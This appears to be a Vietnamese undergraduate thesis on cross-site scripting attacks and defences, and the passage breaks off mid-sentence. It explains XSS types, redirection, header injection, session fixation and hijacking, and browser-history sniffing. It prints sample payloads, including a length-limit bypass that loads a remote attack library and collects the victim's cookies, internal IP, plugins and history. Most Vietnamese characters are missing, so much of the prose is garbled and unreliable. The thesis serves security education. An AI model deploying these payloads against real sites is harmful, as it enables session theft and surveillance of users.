TÌM HIỂU XSS CÁCH TẤN CÔNG VÀ PHÒNG THỦ

Kha lun tt nghip

Kha lun tt nghip2013

NHN XT CA GIO VIN HNG DNGio Vin Hng Dn

Ths. Nguyn ng QuangNHN XT CA GIO VIN PHN BINGio Vin Phn Bin

LI CM NLi u tin, nhm em xin gi li cm n n cc thy c trong Khoa Cng Ngh Thng Tin nhng ngi dy d, ch bo tn tm chng em trong sut nhng hc k va qua cng nh to nhng iu kin tt nht cho chng em c th thc hin ti ny.Nhm em xin gi li cm n chn thnh v su sc nht ti Thy Nguyn ng Quang, xin cm n thy tn tnh ch bo, hng dn v to nhng iu kin tt nht nhm em c th hon thnh ti.Xin gi li cm n ti nhng ngi thn, nhng ngi bn trao i, gip v ng vin chng em rt nhiu trong sut qu trnh thc hin.Tuy c gng rt nhiu nhng vn kh trnh khi nhng thiu st. Knh mong qu thy c v cc bn ng gp kin c th hon thin hn na ti. Chng em xin chn thnh cm n!

Nhm thc hin ti Nguyn Vn Qu Nguyn Ngc Liu

MC LCDANH MC HNH NH5DANH MC BNG BIU6DANH MC CC T VIT TT7CHNG I: T VN 8I.Tng quan81.Website82.Bo mt Web103.Nhng loi tn cng bo mt ph bin11II.Hin trng12III.Mc tiu v phm vi131.Mc tiu132.Phm vi133.Phng php thc hin134.Kt qu d kin13CHNG 2: NI DUNG14I.L thuyt v XSS141.Khi nim142.Phn loi143.Cc k thut XSS s dng164.i tng m XSS hng ti205.So snh XSS vi 1 s kiu tn cng ph bin khc20II. Cc phng thc ca tn cng v khai thc XSS241.Gii thiu chung242. Cc phng thc tn cng XSS243. Khai thc nhng cch tn cng XSS324.Tn cng XSS thng qua khai thc nhng Framework40III. XSS Worms541.Gii thiu chung542. Mt s XSS Worm ph bin.55IV.Ngn Chn XSS581.Gii thiu chung582.Filtering593.Input Encoding624.Output Encoding645.Web Browsers Security64Chng III: Demo66Chng IV: Kt lun66I.Kt qu t c661.V mt l thuyt662.V mt demo66II.u, nhc im671.u im672.Nhc im67III.Hng pht trin67Ph lc: B cng c h tr671.Acunetix Web Vulnerability Scanner 8672.Grease Monkey683.Burp70

DANH MC HNH NH

Hnh 1.1 Hot ng ca mt website10Hnh 2.1 Minh ha XSS15Hnh 2.2 M t qu trnh tn cng kiu Non-Persistent16Hnh 2.3 M t qu trnh tn cng kiu Persistent17Hnh 2.4 M t qu trnh tn cng bng Session Fixation22Hnh 2.5 M t qu trnh tn cng bng Session Hijacking23Hnh 2.6 Giao din ca JavaScript/CSS API khi s dng thuc tnh getComputedStyle ly thng tin duyt web ca ngi dng26Hnh 2.7 Giao din JavaScript Error Message Login Checker27Hnh 2.8 Li ng nhp Gmail khng hp l t ngi dng28Hnh 2.9 Minh ha qu trnh tn cng mng ni b28Hnh 2.10 Qu trnh thc hin XSS34Hnh 2.11 M t mt trang b li XSS37Hnh 2.12 Kt qu ca tn cng XSS Phising40Hnh 2.13 Kt qu s dng Zombie Control ly a ch IP ca ngi dng45Hnh 2.14 Giao din XSS Attack Library46Hnh 2.15 Giao din chnh ca CheckList47Hnh 2.16 Giao din chnh ca Encode/Decode47Hnh 2.17 Giao din lm vic ca HTTP Respone 49Hnh 2.18 S khc bit XSS PayLoad trong Vulnerability Scanner53Hnh 2.19 Quy trnh lm vic ca XSS KeyLogger53Hnh 2.20 Quy trnh lm vic ca Executable Drive-by Downloader54Hnh 2.21 Giao din console XSS Cookie Thief55Hnh 2.22 Testing mt website vi Xenotix XSS Exploit Framework55Hnh 2.23 Qu trnh chuyn i bng m v lc k t 62Hnh 2.24 Mt s chc nng chnh ca th vin HTML Purifier63

DANH MC BNG BIU

Bng 2.1 1 Danh sch cc l hng XSS c pht hin trn website mt s cng ty ln35Bng 2.2 Mt s port trong Atack42Bng 2.3 Danh sch cc module BeEF46Bng 2.4 AutoAttack AttackList48Bng 2.5 Bng so snh gia cc b th vin filter HTML chng XSS62Bng 2.6 Danh sch phng php m ha u ra quan trng cn thit ngn chn Cross Site Scripting65

DANH MC CC T VIT TT

XSSCross Site Scripting

CHNG I: T VN I. Tng quan1. WebsiteWebsite l tp hp ca rt nhiu trang web mt loi siu vn bn ( tp tin dng HTML hoc XHTML) trnh by thng tin trn mng Internet ti mt a ch nht nh ngi xem c th truy cp vo xem. cu thnh mt website cn c cc thnh phn: Tn min (Domain): l a ch ca website Ni lu tr website (Hosting) Ni dung cc trang thng tin (Webpage).Trang web u tin ngi dng truy cp n t tn min c gi l trang ch (Homepage), sau ngi xem c th xem cc trang khc thng qua cc siu lin kt (Hyperlinks).c im chung ca mt Website: thng tin d dng thay i, cp nht, ngi dng c th xem thng tin ngay lp tc, bt k ni no, vo bt k lc no, khng gii hn phm vi truy cp, s lng truy cp.Mt Website thng c chia lm 2 phn: giao din ngi dng (front-end) - phn ngi dng c th tng tc, thc hin cc thao tc m mnh mong mun v cc chng trnh Website hot ng (back-end) l cc chng trnh c lp trnh da trn cc loi ngn ng ring phc v cho cc yu cu x l c th xy ra trong mt website c lu tr trn my ch. Hin nay trang web chia lm hai loi: Web tnh v Web ng. Web tnh do lp trnh bng ngn ng HTML theo tng trang nh mt Brochure[footnoteRef:1], khng c c s d liu v khng c cng c qun l thng tin trn website. Cn phi bit k thut thit k trang web (thng thng bng cc phn mm nh FrontPage, Dreamwaver, ) khi mun thit k hoc cp nht thng tin ca nhng trang web ny. c im l t thay i ni dung. [1: Brochure: l 1 tp bao gm tt c thng tin v trang .]

Web ng c c s d liu, c cung cp cng c qun l webiste (Admon Tool) cp nht thng tin thng xuyn, qun l cc thnh phn trn website. Loi website ny thng c vit bng cc ngn ng lp trnh nh PHP, ASP.NET, JSP, Perl v qun tr c s d liu bng SQL hoc MySQL.Hot ng:Website hot ng da trn nguyn l:

Hnh 1.1 Hot ng ca mt websiteKhi mt ngi dng nhp a ch vo thanh tm kim, DNS Server s tin hnh phn gii tn min thnh a ch IP ca trang web cn tm kim.Sau khi c a ch IP, trnh duyt s gi yu cu n ni lu tr thng tin (Web server) thng qua phng thc GET hoc POST trong giao thc HTTP.Web server tip nhn yu cu t web client v x l gi tr kt qu v.Web client nhn kt qu v hin th ln mn hnh cho ngi dng xem.Trong qu trnh hot ng ca mt trang web c th c mt firewall vi chc nng xc thc quyn truy cp, qun l v iu khin lung d liu trn mng, bo v ti nguyn, ghi nhn v bo co cc s kin, hot ng nh mt thit b trung gian. Tuy nhin khi firewall ny c nhng l hng th n s tr thnh mc tiu s mt cho nhng phng thc tn cng vo bo mt ca trang web .2. Bo mt Weba. Khi nim:Bo mt l gi cho khng b xm phm, khng b l nhng thng tin khng mong mun.Bo mt Web gi cho nhng thng tin, ti nguyn ca mt website hay ca ngi dng trnh khi vic b nh cp, tro i hay gy sai lch bi cc hacker.b. Tm quan trng ca bo mt Web:Tnh n thi im thng 12/2010 trn ton th gii c 255 triu trang web.[footnoteRef:2] Ni nh vy c th thy s lng khng l ca cc trang web hin nay. Vi 255 triu trang web th s c lng thng tin khng l hn c lu tr trn cc trang web ny. [2: http://vietnamlib.net/tin-tuc/hoat-dong-tttv-the-gioi/thong-ke-internet-the-gioi-nam-2010.]

Nhng trang web thuc nhiu i tng, trong c cc t chc chnh quyn, cc tp on kinh t ln, cc c nhn c nh hng, V d, nu thng tin mt t mt trang web ca mt chnh ph no b nh cp v b s dng vo mc ch khc th s cc k nguy him, hay thng tin v khch hng bao gm: password, s ti khon ca nhng khch hng ti mt ngn hng b ng cp th s nh hng rt ln n ngn hng v c khch hng.Khi b tn cng vo bo mt th mt website s c nguy c sp , ko theo l nh hng rt ln n t chc hay c nhn s hu website ny.Trn y ch l hai v d in hnh v s nguy him khi cc website b tn cng, v vy song hnh vi vic pht trin cc trang web v qui m th vn bo mt cng l vn sng cn ca mi website.3. Nhng loi tn cng bo mt ph binHin nay c rt nhiu cc loi tn cng nhm vo mt website, tuy nhin xt v nguy him v ph bin c th phn thnh nm loi nh sau: B cc li bo mt thng thng do khng cp nht cc bn v ca cc h iu hnh. y l loi tn cng m bt k ai c mt cht kin thc v bo mt web u c th thc hin. B SQL Injection do cc nh lp trnh web khng ch trng vo bo mt khi lp trnh cho mt trang web. y l loi tn cng ph bin nht, nguyn nhn b tn cng do cc trang web c to ra m khng h c bt c b lc hay quy chun no m bo an ton cho website, mt khc code c ly t nhiu ngun m khng chn lc dn n nguy c nhim code c. B Cross Site Scripting (XSS) t nhng tin ch Javascript v do khng lc u vo/ra. y cng l mt dng tn cng ph bin trn website, hacker c th dng kiu tn cng ny truy cp vi quyn ca ngi dng v nh cp nhng thng tin v ngi dng. XSS cng tng t SQL Injection u nm trn tng web v cc kiu tn cng ca n u xoay quanh phng thc encoding URL cho cc ng dn. B nh cp tn min cng l mt loi tn cng m c bit phc v cho mc ch ph hoi. Tnh bo mt ca tn min ph thuc vo nhiu yu t nh s bo mt ca registrar, s bo mt ca hm th ng k tn min, Nu hm th ng k tn min b mt th nguy c tn min b nh cp l rt cao, cch tin hnh qu trnh ny ch yu do phishing v XSS tn cng vo ngi dng nh d v thiu kin thc bo v chnh mnh. B tn cng t chi dch v (DoS/DDoS) l mt dng tn cng cc k ph bin trong thi gian gn y. Mc tiu thng l nhng website mc tiu khng th thm nhp, deface, xa d liumt cch nhanh chng v d dng. Cch thc chnh m cc hacker thng s dng: lm cn kit ti nguyn ca nn nhn (trn mt hoc nhiu my ch) v lm bo ha ng truyn t lm xy ra li dn n server ca website s t chi yu cu t ngi dng gi ln.II. Hin trng

Thi gian gn y, s lng website Vit Nam b tn cng ang c chiu hng gia tng, c bit hnh thc tn cng ph bin thng qua hnh ng xm nhp vo my ch (c mt s my ch cha hng trm trang web), khi my ch b tn cng, cc trang web trong cng b tn cng theo. C th k n nh trng hp ngy 6/6, mt nhm hacker c tn CmTr khai thc l hng trn server v tn cng vo hn 200 website ting Vit hay m ngy 3/7/2011, gn 200 website c tn min .vn, .com, .net nm trn mt s server b tin tc hi thm, trong c c website ca S Ti chnh tnh Bnh Dng. [footnoteRef:3] [3: http://www.baomoi.com/Bao-dong-tinh-trang-bao-mat-server/76/6602986.epi]

Cuc tn cng t chi dch v c quy m ln nht t trc ti nay nhm vo t chc chng spam Spamhaus gy nh hng n vic truy cp web ca nhiu ngi dng mt s ni trn th gii. Theo AP, Spamhaus, cng ty Anh - Thy S chuyn loi b cc qung co thuc Viagra, thuc gim cn... gi mo khi hm th ca ngi dng ton cu, phi hng chu mt cuc tn cng DDoS ln t gia thng 3/2013. V DDoS hng ti Spamhaus tng vt ln ti 300 t bit mi giy - quy m e da c s h tng Internet v khin vic truy cp mng ca ngi dng b chm li, ch khng cn n thun ch l s s ca mt t chc."y l v ln nht tng c bit n trong lch s pht trin Internet", Patrick Gilmore ti cng ty phn tch Akamai Technologies, cho hay."Tht l k diu khi chng ti vn c th online",chuyn gia Vincent Hanna ca Spamhaus ni. Nu mc tiu m tin tc nhm n l h thng mng ca mt chnh ph th h thng s b sp ngay lp tc.[footnoteRef:4] [4: http://www.quantrimang.com.vn/baomat/bao-mat/tin-bao-mat/94602_Internet-chap-chon-vi-vu-tan-cong-DDoS-lon-nhat-lich-su.aspx.]

Trn y l mt s v d v hin trng ca bo mt web hin nay. T nhng v d trn c th thy i tng b tn cng v cng a dng, t nhng t chc chnh quyn ti t chc kinh t v c nhng ngi dng bnh thng nht. Vi nhng cch thc tn cng ngy cng tinh vi v to bo hn nhng hacker ngy cng gy ra nhng thit hi to ln v mi mt m ngi gnh chu nhiu nht chnh l nhng ngi dng web. Tiu biu l nm loi tn cng ni trn, trong Cross Site Scripting (XSS) vi c im ch gy hi pha client, thc hin thng qua cc on script nhng hacker c th thm nhp ti khon ca ngi dng, nh cp thng tin, gi dng ngi dng, chuyn hng cc website hay tn cng nhng mng ni b ang din ra cc k ph bin v rt nguy him. i vi vic s dng XSS th nhng hacker nhm ti nhng li ch t vic khai thc s thiu hiu bit ca b phn rt ln ngi dng thng thng trn khp th gii. Tuy nhin ngi dng web hin nay hon ton c th phng trnh v t bo v c mnh khi cc loi tn cng nguy him ny nu c trang b kin thc c bn.III. Mc tiu v phm vi1. Mc tiuVi s ph bin v nguy him nh hin nay, XSS ang thc s e da ti rt nhiu ngi dng web hin nay, chnh v l do trn nhm chng ti quyt nh thc hin ti Tm hiu v tn cng XSS v cch phng th vi mc ch chnh cho thy cc cch thc tn cng, s nguy him ca tn cng XSS v cch phng chng nhng kiu tn cng trn. 2. Phm vi Tm hiu tng quan khi nim v XSS. Tm hiu cc phng thc tn cng. Tm hiu cc bin php phng chng. Gii thiu mt s cng c h tr trong tn cng v phng th.3. Phng php thc hin Nghin cu ti liu.4. Kt qu d kin Trnh by khi nim tng quan v XSS. Phn bit v nhn dng c nhng loi tn cng. p dng nhng cch phng th vi tng kiu tn cng. Thc hin mt s v d minh ha qu trnh tn cng v phng th.

CHNG 2: NI DUNG

I. L thuyt v XSS1. Khi nimHnh 2.1 Minh ha XSSCross - Site Scripting hay cn c vit tt l XSS l mt k thut tn cng bng cch chn vo nhng website ng (ASP, PHP,CGI,) nhng th HTML hay nhng on m script nguy him c th gy hi cho nhng ngi s dng khc. Trong nhng on m nguy him thng c vit bng cc Client Site Script nh: JavaScript, Jscript, DHTML v cng c th l cc th HTML.XSS thng c dng:http://www.xxx.vn//index.php?pg=news&cat=alert(LiXSS)

XSS l mt kiu tn cng bo mt web rt ph bin hin nay.2. Phn loia. Non-Persistent:

Hnh 2.2 M t qu trnh tn cng kiu Non-Persistent.Non-persistent (hay reflected) XSS l mt loi XSS ph bin nht.Loi ny xut hin khi d liu c cung cp t mt web client no . Hacker khi mun tn cng th iu u tin l s phi tm ra l hng bo mt trn website bng cch gn mt on m test vo web client web client gi n web server v ch phn hi ca web server tm ra l hng bo mt.Hacker tn cng da vo s thiu ch v vic lc d liu vo t URL ca webiste. Hacker s gn thm nhng on m c vo y v thc hin hnh vi tn cng website.Loi tn cng ny ch c tc dng trong mt ln.b. Persistent:Persistent (hay stored) XSS l mt bin th tn ph gy hu qu rt nng n.Loi XSS ny xy ra khi d liu do cc hacker cung cp c lu tr trn cc my ch thng qua mt s chc nng trn website v t v sau th cc d liu ny hin nhin c hin th mt cch bnh thng trn cc trnh duyt ca ngi dng m khng cn ti HTML ring na. Khi ngi dng click vo nhng phn b gn m c th b dnh XSS.

Hnh 2.3 M t qu trnh tn cng kiu PersistentPersistent XSS pht sinh khi d liu t client khng c lc k cng.Persistent l mt loi XSS gy nguy hi hn Non-persistent do mt khi b dnh li ny th n s t ng thc hin cc hot ng gy hi cho pha ngi dng.V d:Khi ng k thnh vin, phn gii thiu v bn thn, nu hacker nhp vo m XSS v website khng kim tra k d liu u vo, th mi khi truy cp trang thnh vin ca hacker , bn s b khai thc.3. Cc k thut XSS s dnga. Redirection:Redirection iu hng l mt k thut tn cng c bn.Cch thng thng m hacker dng tn cng ngi dng l thng qua mt website uy tn bi v ngi dng ch tin tng nhng website c uy tn. Khi click vo mt ng link trn website ngi dng s b chuyn n mt trang web no bn ngoi m hacker mong mun.Hacker s dng k thut ny kh ph bin, khi vo mt trang web s thy xut hin nhng ng link, nhng flash hay nhng hnh nh kch thch s t m ca ngi dng, ch cn click vo chng th ngay lp tc b chuyn n mt trang web khc m hacker mong mun.C ba dng Redirection : Header Redirection: c th s dng nhiu loi code khc nhau nhng ch yu l dng giao thc HTTP a trnh duyt ca ngi dng n website hacker mong mun. META Redirection: s dng nhng th HTML chuyn n website ch, META Redirection hot ng tng t Header Redirection nhng n li c mt li th l dng ny c th duy tr mt thi gian chuyn hng nht nh. Tuy nhin c th b v hiu ha bi ngi dng v cng khng hot ng trong text-based readers khi ngi dng khng thc hin thao tc click chut. Dynamic Redirection: c th cha bn trong mt Flash movie, JavaScript hoc bn trong code ng pha client. Li th ca dng ny l hot ng c th da trn vic pht sinh s kin ch khng ch ph thuc vo thi gian. Tuy nhin, n li ph thuc hon ton vo trnh duyt hot ng.Thng thng Redirectors trng nh mt mt xch trong chui URL, n bao gm cc tham s cha bn trong du chm hi.V d: http://www.youtube.com/watch?v=DVIfi6xGvrw. trnh b hacker khai thc, URL cn c m ha. Tuy nhin vic ny li mang nhng bt li cho ngi dng nh: URL qu di, qu kh nh.b. HTTP Respone Injection:HTTP Respone Injection l mt k thut lin quan n nhng hacker c kh nng tim vo headers phn hi. Mi kt qu tr v bao gm header v phn ni dung, xen k gia hai phn ny l mt khong trng m nu nh hacker c th tim nhng k t c bit vo th nguy c b tn cng XSS l rt cao, khi ngi dng c th b u c b nh cache v nhiu th khc na.K thut ny c th s dng trong trng hp c on m chuyn hng cn mt URL lm u vo v phi to ra cc header thch hp chuyn hng ngi dng n ngun ti nguyn quy nh.Ty thuc vo ngn ng nn tng my ch v cc tnh nng bo mt c s dng, k thut tn cng ny c th c ngn chn. Tuy nhin, m bo th ta nn m ha hay lc tht k nhng chui u vo cho mi header.c. Source with real DHTML:DHTML Dynamic HTML l s th hin ca vic to ra mt trang web bng nhiu thnh phn nh: HTML tnh, JavaSript, CSS, DOM. Cc c im ca DHTML: Ni dung ng (Dynamic Content): c h tr bi Internet Explorer. y chng ta c th thay i ch v hnh nh trn trang web sau khi n hin th. Cng c th thay i ni dung ca trang khi p li d kin nhp vo hay s kin ngi dng kch chut vo. Lin kt d liu (Data Binding): Trong DHTML, c th kt ni mt c s d liu vo bng ca trang web. N c h tr bi Internet Explorer. Khi trang c np ln, d liu t c s d liu trn my ch c hin th trong bng. D liu c th c sp xp, lc v hin th cho ph hp vi yu cu. Scripting: Chng ta c th vit cc script thay i kiu v ni dung ca trang web. Script ny c lng vo trong trang web. Cu trc i tng (Object Structure): DHTML theo mt cu trc i tng, ngha l mi phn t c i x nh mt i tng trong cu trc. Mi i tng c th c truy cp v lp trnh c lp. c trng ca mt trang web s dngDHTMLc cu thnh nh sau: DHTML example var init=funtion() {myObj document.getElementById(navigation); }; Window.onload=init;

K thut ny da vo vic khai thc s h source code ca mt website ng no chn nhng on m c hi vo website nhm nh cp, thay i thng tin hay theo di ngi dng,Tuy nhin vi mi trnh duyt khc nhau th cch hot ng ca k thut tn cng ny cng khc nhau. d. Bypassing XSS Length Limitations:y l mt trong s nhng k thut gip hacker c th tng thm s k t c bit chn vo so vi s lng k t cho php thng thng, bng cch s dng nh dng mnh v XSS payloads thc hin vic ph v nhng quy tc v s k t gii hn cng nh vt qua h thng pht hin v ngn chn ca mi website. http://www.acme.com/path/to/search.asp?query=">[payload]Theo l thuyt s ch c th chn c 60 k t sau >, nhng thc t th cn nhiu hn c th khai thc XSS.V d:http://www.acme.com/path/to/search.asp?query=">eval(location.hash.subst r(1))#alert('xss')

Ta c th thy trong phn [payloads] c gi hm eval ca JavaScript, y chnh l cng c c s dng trong k thut ny. Vi mt on m di vt qu s k t cho php cn bm nh ra s k t nh hn hoc bng s k t cho php.Bng cch ny c th truyn vo s k t khng gii hn.V d: http://www.acme.com/path/to/search.asp?query=">eval(location.hash.substr(1))#functioninclude(url,onload){varscript=document.createElement('script');script.type='text/javascript';script.onload=onload;script.src=url;document.body.appendChild(script)};include('http://www.gnucitizen.org/projects/attackapi/AttackAPIstandalone.js',function(){vardata={agent:$A.getAgent(),platform:$A.getPlatform(),cookies:$A.buildQuery($A.getCookies()),plugins:$A.getPlugins().join(','),ip:$A.getInternalIP(),hostname:$A.getInternalHostname(),extensions:[],states:[],history:[]};varcompleted=0;$A.scanExtensions({onfound:function(signature){data.extensions.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanStates({onfound:function(signature){data.states.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanHistory({onfound:function(url){data.history.push(url)},oncomplete:function(){completed+=1}});vartmr=window.setInterval(function(){if(completed

Trong mt trng hp khc khi hacker s dng th script.Vd: var query_string=";alert(XSS);//";somefunction(query_string);function somefunction {}

Hacker thm vo mt quote sau du quote ca website v thm du ; kt thc vic khai bo bin query_string, sau s chn on m cn thit vo ri kt thc dng bng du // JavaScript hiu y l mt comment qua hacker s thot c b lc ca website.Trn y ch l mt s v d dn gin v cch vt qua b lc ca mt website, Filter Evasion l mt k thut kh n gin nhng cn ngi thc hin phi hiu r v hot ng ca website v c tnh sng to. 4. i tng m XSS hng tiXSS l mt kiu tn cng bo mt rt ph bin.i tng hng n l nhng webiste bo mt s si, vit bng PHP, JavaScript, web ng v nhng ngi dng thiu kin thc v XSS.Khi tn cng XSS c kh nng nh hng ti cc site cho php ngi dng nhp d liu vo nh: cc cng c tm kim Forms c in bi user, web message boards, guestbook. Hacker khai thc XSS :- Truy cp thng tin nhy cm hoc b hn ch. - n cp tin (giao dch ngn hng, mua hng online.). - Theo di thi quen lt web ca ngi dng.- Thay i tnh nng ca trnh duyt.- Bi nh danh ting ca mt c nhn hay cng ty.- Hy hoi ng dng Web.- Tn cng t chi dch v.5. So snh XSS vi 1 s kiu tn cng ph bin khca. SQL Injection:SQL Injection l mt trong nhng kiu tn cng ph bin v rt nguy him. Li dng nhng l hng trong lp trnh ca mt webiste trong truy xut d liu. M SQL s c chn vo hoc ni thm vo ng dng web pha ngi dng, sau c chuyn cho my ch SQL phn tch c php v thc hin. Hacker c th ly c nhng thng tin lu trong c s d liu nh: username, password, chi tit th tn dng, Nguyn nhn li:SQL l ngn ng chun truy cp vo Microsoft SQLServer, Oracle, MySQL, Sysbase v Informix cng nh cc my ch c s d liu. Trong mt website cn c cc cch thc kt ni vi c s d liu v y l nhng ch hacker c th khai thc. Cc l hng SQL Injection xy ra khi cc nh pht trin web khng xc thc c cc tham s u vo trc khi thc hin cu truy vn trn c s d liu. C hai hnh thc m hacker khai thc l: Do ngi lp trnh web s dng chui cp pht ng vi s ph thuc vo gi tr ca ngi dng nhp vo, gi tr ny nu khng xc thc tt s b khai thc. Do x l sai cc k t c bit. Nh trnh by phn Filter Evasion, hacker c th li dng cc k t c bit vt qua b lc ca website v khai thc. Cch pht hin:Li SQL Injection thng c kim tra t xa. SQL Injection c th xy ra trong nhiu ng dng nhng trong phn ny ta s ch tp trung vo mi trng web v y l mi trng xy ra nhiu li nht. Phng php thc hin: Kim tra bng phng php suy lun:Xc nh tt c mc d liu trn cc ng dng webBit nhng loi yu cu c th gy ra s bt thngPht hin s bt thng trong cc phn hi t my ch Xc nhn li d liu u vo: GET hay POST Li c s d liu:Ngi dng s gi mt yu cu thng qua l hng SQL Injection, ngi dng s gi mt gi tr vi mt on m ni vo yu cu.Cc my ch web ly d liu ngi dng v gi mt truy vn SQL vo my ch c s d liu, c php ca cu truy vn ny c khng ng.Cc my ch c s d liu nhn c truy vn SQL b thay i v tr li thng bo li cho my ch web.My ch web thng bo li cho ngi dng.Cc k thut tn cng: Li dng s phn bit gia ch v s Chn chui Chn s Kt hp vi UNIONCch phng chng: S dng cu lnh cha tham s: s dng cch ny thay cho vic s dng v lm vic trc tip vi d liu ngi dng nhp vo. Kim tra d liu: gm loi b nhng d liu khng hp l v ch nhn nhng d liu hp l.b. Session Fixation:Session Manager: qun l vic cp pht Session ID, cc cng vic lin quan ca mt session.

Hnh 2.4 M t qu trnh tn cng bng Session FixationMi phin lm vic trn web u s c cp mt Session ID lu tr thng tin v phin lm vic.Session ID: lu tr nh mt dng mt khu tnh, nu hacker ginh c Session ID ny th s lm ch c phin lm vic.Qu trnh tn cng bng Session ID: Bc 1: Thit lp Session ID Bc 2: Gi Session ID ny ti trnh duyt ca nn nhn. y l bc kh nht v cng l quan trng nht, c th thc hin qua ba cch:Tn cng Session ID trn tham s URLTn cng Session ID bng bin n formTn cng Session ID trong cookie Bc 3: t nhp vo phin lm vic ca nn nhn bng Session ID nh cp c.Phng chng: ch trn nhng ng dng web mi cn phng chng li kiu tn cng ny.Cch 1: Chng vic ng nhp vi mt Sesion ID c sn.Cch 2: Phng chng hacker bn ngoi h thng.Cch 3: Gii hn phm vi ng dng ca Session ID.Kt hp Session ID vi a ch ca trnh duyt.Kt hp Sesion ID vi thng tin chng thc cm ha SSL ca ngi dng.Xa b Session khi ngi dng thot khi h thng hay ht hiu lc, c th thc hin trn trnh duyt ch hoc trnh duyt (cookie)Ngi dng phi s dng ch thot khi h thng xa b session hin ti v c nhng session cn lu li trn h thng.Thit lp thi gian ht hiu lc cho session.

c. Session Hijacking:Hnh 2.5 M t qu trnh tn cng bng Session HijackingSession Hijacking cng l mt kiu tn cng nhm ly Sesion ID nhng khc vi kiu tn cng n nh phin lm vic nh ni trn, kiu tn cng Session Hijacking ny thc hin tn cng vo trnh duyt ca nn nhn sau khi nn nhn ng nhp vo h thng. Cch tn cng ny s ch ginh c quyn truy cp mt ln v khng yu cu duy tr phin lm vic.Phng php tn cng:- D on phin lm vic (Prediction Sesion ID): sau khi ng nhp hp l nhiu ln v tm ra quy lut pht sinh Sesson ID th hacker c th on c gi tr tip theo ca ngi dng sau.- Vt cn phin lm vic (Brute Force ID): Hacker c th to mt chng trnh d tm Session ID bng cch gi mt lc nhiu yu cu n trnh ch, hacker da vo thi quen cp Session ID theo thi gian v a ch IP ca ngi qun l cho ngi dng gii hn vng vt cn.- Dng on m nh cp phin lm vic: hacker c th chn mt on m c la ngi dng qua nh cp Session ID ca ngi dng, cch ny thc hin thng qua li XSS.Cch phng chng: p dng tt c cc cch phng chng ca hai phng php tn cng n nh Session ID v tn cng XSS.II. Cc phng thc ca tn cng v khai thc XSS1. Gii thiu chungHin nay cng vi s pht trin v cng ngh, cc hacker c th a dng ha phng thc tn cng, mt s k thut tn cng ph bin c th k n nh: SQL Injection, Ddos, Local Attack, XSS. Trong XSS l k thut tn cng m hacker thng hay dng n, Cross Site Scripting cho php mt k tn cng nhng m c JavaScript, VBScript, ActiveX, HTML hoc Flash vo mt trang nng ng, d b nh la ngi s dng, thc hin kch bn trn my tnh ca mnh thu thp d liu. Vic s dng c th tha hip XSS thng tin c nhn, thao tc hoc n cp cookies, to ra cc yu cu m c th b nhm ln vi nhng ngi ca mt ngi dng hp l, hoc thc thi m c trn h thng ca ngi dng cui, d liu thng c nh dng nh mt siu lin kt c cha ni dung c hi v n c phn phi trn bt k phng tin c th c trn internet. Trong phn ny chng ta s tm hiu mt s phng thc tn cng XSS chnh.2. Cc phng thc tn cng XSSa. nh cp Cookies ngi dng:Cookie l mt b nhc nh m website lu tr trn my tnh ca bn c th nh danh cho bn. Khi bn truy cp v mt trang web, website ny s t mt cookie ti trn my , thay cho vic lin tc hi bn cc thng tin nh nhau, chng trnh trn website c th sao lu thng tin vo mt cookie m khi cn thng tin s c cookie . Nu khng c cookie bn s phi nhp li thng tin ca mnh trn mi mn hnh web. Thng tin duy nht m cookie lu tr l thng tin m bn thn bn chia s vi website to ra cookie.Cookie c cc loi sau:- Session Cookie: c lu trong b nh ca my tnh ch trong phin duyt web v s t ng xa khi my tnh khi trnh duyt ng li. Nhng cookie ny thng c lu tr di dng ID. N cho php bn nhanh chng chuyn ti mt trang mi m khng cn ng nhp li. Chng c s dng rng ri nhng trang web thng mi. V d: theo di cc bn ghim ngi tiu dng thm vo gi hng- Persistent Cookie: c lu tr trn cng ca my tnh v khng b xa khi trnh duyt ng li. Nhng cookie ny c th thit lp nhng s thch ca bn i vi mi trang web c th khi bn quay li, cho php nhng u i s c s dng trong nhng ln trnh duyt tip theo.Persistent Cookiec th c s dng nhn dng bn, phn tch hnh vi ca bn khi lt web. Chng cng c th c s dng cung cp thng tin v s lng khch hng truy cp, thi gian trung bnh cho mt trang c th, ng nhp thng tin c lu tr trong ti khon hiu sut ca web.- Cookie ca mt hng th 3: Cookie cho php cc cng ty tip th hoc qung co.Khi mt hacker tin hnh mt cuc tn cng truyn thng da vo thi quen v s thch ngi dng. Thay v tn cng trn din rng hacker s tp trung khai thc vo khu vc d b tn thng nht trn website, s dng mt vi th thut n gin nh dng cc th javascript/css v html k tn cng s thc hin mc tiu tn cng ca mnh nh: chim quyn h thng, thc hin chuyn tinKim tra getComputedStyle trong JavaScript/CSS APIgetComputeStyle l mt thuc tnh gip ly thng s ca DOM Style, thuc tnh ny cho php ly nhng thng tin mi nht ca mt i tng.Lch s cc cuc tn cng s dng JavaScript/CSS ghi nhn phng thc brute-force mang li hiu qu cao trong vic pht hin v tr ngi dng. Trung bnh ngi dng s b dnh vo hng chc Website la o, trc tin hacker s lit k mt danh sch cc Website ph bin nht theo nhu cu ngi dng v lc k tn cng da vo danh sch ny gim st qu trnh truy cp ngi dng. K thut ny da vo m hnh DOM (Document Object Model) s dng s khc nhau v mu sc pht hin cc lin kt truy cp. Bng cch to ra cc lin kt ng, attacker c th kim tra thuc tnh getComputedStyle trong JavaScript trch xut thng tin v lch s truy cp, mt qu trnh x l ht sc n gin nhng mang li hiu qu cao. Nu mt lin kt c mt mu, nh mu xanh, nn nhn khng gh thm URL, nu vn bn l mu tm, ngha l h truy cp vo.Hnh 2.6 Giao din ca JavaScript/CSS API khi s dng thuc tnh getComputedStyle ly thng tin duyt web ca ngi dng.JavaScript Console Error Login Checker Ngi dng thng xuyn ng nhp vo cc WebSite ph bin, bit c kh nng thnh cng khi tn cng vo cc Website ny l kh cao nn cc attacker thng thc hin cc cuc tn cng vi quy m ln. K thut ny s dng phng php tng t nh JavaScript Port Scanning bng vic kim tra li ng nhp t giao din JavaScript Console, nhiu Website yu cu khi ng nhp phi c URL v tr v ni dung HTML khc nhau ty thuc vo qu trnh ng nhp c hoc khng.V d: Qun l ti khon ngi dng, ngi qun tr mun thc hin chc nng trn bt buc phi c xc thc trc khi truy cp vo Website. Nu URLs c np mt cch t ng thng qua th n s gy ra cc li khc nhau v c ghi nhn qua giao din JavaScrip Console bi v phn hi y l cc chui dn xut HTML.K thut ny s dng cng c rt hu ch l JavaScript Login Checker. Cng c ny gip attacker c th bit c i tng ca mnh c ang login vo ti khon hay khng v ng nhp thnh cng hay tht bi. Sau da vo thng tin tr v ca qu trnh ng nhp 